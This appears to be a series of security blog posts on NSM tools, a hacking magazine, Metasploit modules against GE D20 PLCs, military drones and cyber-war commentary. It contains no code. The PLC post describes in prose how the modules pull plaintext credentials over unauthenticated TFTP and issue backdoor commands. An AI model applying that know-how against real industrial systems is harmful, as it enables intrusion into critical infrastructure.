Security Onion is one of my favorite tools. Doug Burks did an amazing job pulling many of the top open source Network Security Monitoring (NSM) and Intrusion Detection System (IDS) programs. You can run Security Onion in Live CD mode, or you can install it and run it off of your hard drive.

It’s based on Xubuntu 10.04 and contains a ton of programs including Snort, Suricata, Sguil, Squert, argus, Xplico, tcpreplay, scapy, hping, and many other security tools. Sounds complicated right? Well, Doug has done the hard work in pulling all these tools together into an easy to use Linux distribution.

Run this on a system that has two network cards and you have a complete NSM/IDS system. One NIC connects to your network or the internet side of your traffic and records and monitors every packet that comes in or goes out of your system. The second NIC connects to your LAN side and can be used to remotely view and monitor intrusion attempts and security threats.

The exceptional basic setup video above was created by Adrian Crenshaw aka “Irongeek”. Adrian has always done an amazing job passing on information on the latest security tools and techniques. Irongeek.com has a ton of videos and security how too’s, check it out!

Posted in Computer Security
Tags: intrusion attempts, Intrusion Detection, intrusion detection system, intrusion detection system ids, Intrusion Prevention, Linux Security, Network Security Monitoring, scapy, Security Onion, squert

Hakin9 is well known in the security circles and is just a great magazine. It is known as “A magazine for IT security professionals by IT security professionals”. It covers some of the latest information on attack and defense tactics that are out there.

For those of you who are not familiar with Hakin9, the Worldwide IT Security magazine started in 2005 and is released 4 times a month:

• Hakin9 (release date:1stof each month) – 50 pages of content dedicated to IT security, few regular columns written by specialists
• Hakin9 Mobile (release date: 7th of each month) – 40 pages of content devoted to hacking and security of mobile devices and applications
• Hakin9 Extra (release date: 15thof each month) – 50 pages of strictly topical content dedicated each time to different hot security topic
• Exploiting Software (release date: 22nd of each month) – 40 pages of content dedicated to latest software exploits and security

This months Exploiting Software magazine has some interesting articles including:

Starting to Write Your Own Linux Schellcode
Buffer Overflow Exploitation A to Z
Anatomy of the Black Hole Exploit Kit
Hacking Applets: A Reverse Engineering Approach
The Gentoo Hardened Project: Or How to Minimize Exploits Risks

And, forgive me for some shameless self promotion, How to Recover Passwords from a Memory Dump.

How to Recover Passwords from a Memory Dump

Malware analysis is an amazing field. To be able to grab a memory dump from a live machine and then have the capabilities to pull useful information from it just amazes the author. Can we find pertinent system settings, and even pull information from them? Were you ever curious about what could be done with a memory dump of an active computer? This article is a short demonstration on how to acquire a memory dump from a running system, and then how to use tools to not only recover the system password hashes from the memory dump, but also how to decode them.

The Hakin9 article I wrote is based on the memory forensics topics & hash cracking posts that have been covered recently here on CyberArms. I am pretty excited about it, and hope you like it too.

Check it out!

Posted in Computer Security
Tags: buffer overflow, Computer Forensics, Computer Magazine, Cyber Security, Hakin9, IT Security, Memory Forensics, software exploits

Interesting news yesterday from Digital Bond and Rapid 7, PLC exploits have been added to the Metasploit security testing platform. HD Moore developer of the Metasploit project had this to say on Twitter:

According to the Rapid 7 Blog the following exploits that target General Electric’s D20 PLCs have been added to Metasploit:

• d20pass : This module leverages a pretty major information disclosure for the device — turns out, anyone who connects to the TFTP server on the D20 can snag the complete configuration for the device, which includes plaintext usernames and passwords. This module does just that — downloads the configuration file, parses out the credentials, and stores them in Metasploit’s database for reuse.
• d20tftpdb : This module demonstrates an asynchronous backdoor functionality in the D20 via the TFTP interface. Again, in an unauthenticated way, anyone can connect to the TFTP server, and issue command by writing to a special location on the filesystem. Also again, this is a pretty big deal. Note that this module is currently still in the unstable Metasploit branch pending a little more QA work on getting this (pretty unique) command and channel all nice and automated. As is, though, it works just fine for demonstration purposes, and if you have some of these PLCs in your environment, you are encouraged to investigate this more (and send patches!).

With the media hype of “CyberWar” and the news of hacker attacks against critical infrastructure systems, this is a shocking move by the Metasploit team. But maybe that is what they intended.

Metasploit is used for network security and penetration testing and it is very good. There are automated options that you can use with Metasploit that will try numerous exploits against a system, and give you a remote shell if one of them works. Taking this technology  and adding in PLC exploits is truly scary, or should I say, push button easy.

Just last month the FBI released the news that infrastructure systems of three US cities were hacked:

“We just had a circumstance where we had three cities, one of them a major city within the US, where you had several hackers that had made their way into Scada systems within the city.” And, “Essentially it was an ego trip for the hacker because he had control of that city’s system and he could dump raw sewage into the lake, he could shut down the power plant at the mall – a wide array of things.”

The problem is, even though people who run PLC devices in a SCADA environment have had years of warnings, many systems are still woefully unprotected, some even using default passwords. And many of these systems can be found using simple online search tools.

Most likely the thinking behind publicly releasing a tool to automate PLC exploits is that it will force companies to lock down their SCADA systems, as Dale Peterson, founder of Digital Bond states:

“We felt it was important to provide tools that showed critical infrastructure owners how easy it is for an attacker to take control of their system with potentially catastrophic results. These attacks have existed in theory for a while, but were difficult to demonstrate to a Plant Manager. By creating exploit modules for the most widely used exploit framework – Metasploit – we hope that security professionals in critical infrastructure companies, consultants, and penetration testers will prod vendors to add basic security measures to PLCs after decades of neglect.”

Hopefully this tactic works and the good guys are the ones using the tools.

Posted in Cyber War
Tags: Backtrack, Cyber Security, Cyber War, hacker attacks, infrastructure systems, Metasploit, metasploit project, PLC, remote shell, SCADA, usernames and passwords

Cyber war is all the rage now, but advanced persistent threats are not the only cool thing that happens when you marry hardware and software together. Check out some of the latest tech that is coming down the pipe to a battlefield near you:

US Army A160 Hummingbird VTOL UAS

By early summer, the US Army will deploy three of these robotic helicopters to Afghanistan.

“The U.S. Army is using a hybrid-type acquisition approach to develop a helicopter-like, Vertical-Take-Off-and-Landing Unmanned Aerial System with a so-called ARGUS wide-area surveillance sensor suite designed to beam back information and images of the surrounding terrain, service officials said.”

This unmanned eye in the sky will come packing a whopping 1.8-gigapixel color camera, and will be able to scan an area of about 25 miles.

“To provide a sense of just how high-resolution this sensor is, Leininger compared it to a standard cell phone camera. A cell phone image typically runs between 1 million and 2 million pixels. With ARGUS-IS, it’s 900 to 1,800 times that number — enough to track people and vehicles from altitudes above 20,000 feet.”

USMC Kaman K-Max

This unmanned cargo helicopter is already in service in Afghanistan. Two were sent in August of last year for battlefield trials. One successfully completed an actual mission last month.

They will be used for resupplying troops in hard to get to or dangerous locations. The K-Max can be flown remotely or the more traditional way requiring a pilot:

“K-MAX, which employs a unique counter-rotating, dual-rotor design that eliminates the need for a tail rotor, is capable of lifting 6,000 pounds, or nearly its own weight. Originally designed as a manned civilian craft, K-MAX has been modified by Lockheed to operate with or without a pilot onboard.”

The goal in Afghanistan is to reduce the number of manned convoys. Drone vehicles could eventually account for a large portion of resupply missions:

“Pratson has said a single K-MAX helicopter could reduce reliance on convoys to resupply forward operating bases in Afghanistan by 6 percent. At that volume, a fleet of 16 to 20 aircraft theoretically could handle 100 percent of the resupply mission in Afghanistan, although that isn’t the plan for now.”

Robots of the Future

The military has already made heavy use of robots in detecting and disposing of explosive and IED devices. But the push is on to make these robots even more autonomous and intelligent. The Space and Naval Warfare Systems Center Pacific is working with the Naval EOD technology division to create the next generation robots.

According to the Department of the Navy’s October-December 2011 issue of CHIPS magazine, color and infrared technologies will be used to map an area and detect hostile targets or suspicious devices:

“The Autonomous Robotic Mapping System (ARMS), for example, can automatically explore an unknown or hostile environment while building a highly accurate and detailed map. A scanning laser rangefinder measures distance to all surrounding objects within a 360-degree field of view, and stereo cameras assist with three-dimensional rendering. No human guidance is necessary, other than initial high level direction telling the robot where to search.”

Military drones and robots currently save lives and with the demand for more and better platforms, they will increasingly take over more common and dangerous tasks making our troops safer and more effective.

Posted in Military Tech
Tags: a160 hummingbird, cargo helicopter, Drones, Military Robots, UAV

(Photo/China Daily, mod.gov.cn)

According to the China News Service (ECNS), China is a victim in cyberwar and needs to develop a strong security force to defend itself from further attacks. Hence the “Online Blue Army” has been created and is ready for cyber warfare.

Using rhetoric similar to cold war Soviet Union, CNS paints China as the developing nation trying to defend itself against international threats.

When I was a child growing up I heard numerous times that the Soviet Union needed so many nuclear missiles to protect it’s vast land mass from aggressors. Everyone knew though that the large missile stockpile was more of a threat than a safety net. It seems that China may be trying to play the same card.

Granted China has the most internet users, about 485 million. That is a lot of users, especially when compared to the US who sits at #2 with 245 million. The scary part is that the US already has about 80% of our population connected, whilst China is only about 40% connected. And just by shear number of users, would have a large amount of virus infections.

But is China the victim that they claim? ECNS states,  “China can be described as merely a computer user with a fairly fragile Internet security system. These are circumstances that cry out for the build up of Internet security forces.”, and, “China is a defender in the cyber war battlefield, fending off the ‘information warfare’ and ‘media warfare’ of others...”

Not likely, China has faced international condemnation from numerous nations that claim China has not only infiltrated key networks, but have exfiltrated government and military secrets. But yet, they claim that the “Online Blue Army” will help defend China’s military internet and that it is only in an “entry level” state:

Li Li, a military expert at the National Defense University, told the People’s Daily that compared with the online military units of Western countries, China’s “Online Blue Army” is currently at its fledging stage, and applied more in online maneuver mode than as an organic, large-scale online army.

Though the article denies that the “Blue Army” tag has any relevance, in military war games the “Red Team” is normally the aggressor force, and the “Blue Team” is usually the defending force or “good guys”.

China already has a very strong cyber capability. I am really not sure what they are trying to prove or who they are trying to deceive by this obvious propaganda piece, but we are not buying it.

Posted in Cyber War
Tags: Chinese Hackers, Cyber Attack, Cyber Security, Cyber Warfare, PLA

We have all heard about Iran claiming to bring down the American Stealth Drone with a sophisticated cyber attack. According to their claim, they somehow tracked our RQ-170 stealth drone , deciphered our military GPS system, blocked our communication to the drone, then spoofed the GPS signal making the drone think that it was returning to base, and finally landed it with minimal damage.

Once they had it, they are now trying to convince us that they can extract data from the encrypted on-board database, reverse engineer the drone and use the technology to make their own UAV drones that are comparable or more superior to the US.

But how advanced is Iran’s home grown UAV program?

An Iranian college recently released information on a UAV that they have created:

At first it looks like a full size leer jet, until you notice the car in the background. Another thing that stands out of this homegrown Iranian Drone is the word “Honda” on the side.

Hmm… Either this means “Death to America” in Farsi or could China be helping them build a new class of advanced drones?

Apparently you too can have your own Advanced Iranian UAV. Our researchers have found not only a blueprint for the classified design, but a complete parts kit and instruction manual (written in English!):

You can even buy one for yourself or a friendly third world country.

Tell them Ahmadinejad referred you for a 10% discount! Order in the next 15 minutes and get the new Ahmadinejad bobble head doll with realistic “Death to America” action.

Act now, supplies are limited!

(Okay, before my inbox gets flooded with e-mails, the CIA starts to investigate me or Model RC Planes Inc. gets hit with angry people who want a 10% discount or an Ahmadinejad bobble head doll, this is just a joke!  )

Posted in Military Tech
Tags: gps signal, gps system, Iran Drone, military gps, rc planes, RQ-170, Stealth Drone, UAV

I had to take a relative out of town to see a specialist at a “more modern and up to date” medical facility. Apparently the local award winning hospital was just not good enough. And you can tell he was a specialist, because the hour wait to get into an examination room was followed by another hour waiting to be actually seen by the doctor for 5 minutes.

While I was there I was shocked by the lengths that they went to enforce HIPPA privacy. No longer do you wait in a cattle line to check in. No way, you waited in a lobby with your hands folded gently in your lap for your number to be called. And when the glorious bank teller like receptionist finally called you, you hesitantly approached the exalted one and waited behind a line painted on the floor ten feet from the desk.

Just in case you missed the bright yellow line and the painted feet showing you where to stand, signs posted everywhere stated in a draconian font, “For patient safety, stand behind the painted line until called, or you will be shot.” Or something like that. I guess they didn’t want you to see that the receptionist was on Facebook before they were ready for you.

Each receptionist Window had wide blinds installed so that you couldn’t see anything going on at the next receptionist window. And each computer monitor had a privacy screen to protect that classified patient data.

Once in the exam room all seemed to change though. The nurse dutifully checked my relative’s vitals, logged into the Windows XP computer in the room and entered all the information into their online system. She then told us the doctor would be in to see us within the next month or so and left the room.

Sitting there pondering life for what seemed like an eternity, I noticed several things. One, she seemed to stay logged into the patient database when she left the room. Two, no password protected screen saver kicked on. Three, she left the logged in system unattended in a room with patients for literally about an hour. Four, when the Doctor finally graced us with his presence, he did not log in, just moved the mouse to turn off the screen saver and started viewing my relatives file.

Finally when we left, we had to go the the billing window. Again, the wait behind the line nonsense. Then the billing window with the privacy dividers and screens. As I stood there as my relative paid the co-pay, I looked at the wall beside the checkout clerk. In plain site was a note that stated:

Wireless Password: (And it listed a Password)

John XXXXX – IT Tech Support guy
XXXXXXXX – Tech Support Company Name
XXX-XXXX – Tech Support Phone Number

Okay, noticing that the Billing workstations seemed to be connected wirelessly, one could assume that the listed password was indeed the password used to connect to the wireless network. Also, the listing of the tech support personnel name, company and phone number is a social engineer’s dream.

The Bible verse, “Strain at a gnat, but swallow a camel” really came to mind when we left. They went to exorbitant levels to protect individual patient privacy, but then left the keys of the kingdom out in plain view. Hopefully this isn’t an example of every doctor’s office, but a little knowledge about how a social engineer attacks a network would come in a long way in not just protecting one patient’s privacy, but the security of the whole patient database.

Posted in Computer Security
Tags: Computer Security, HIPPA, medical facility, patient data, patient database, Social Engineering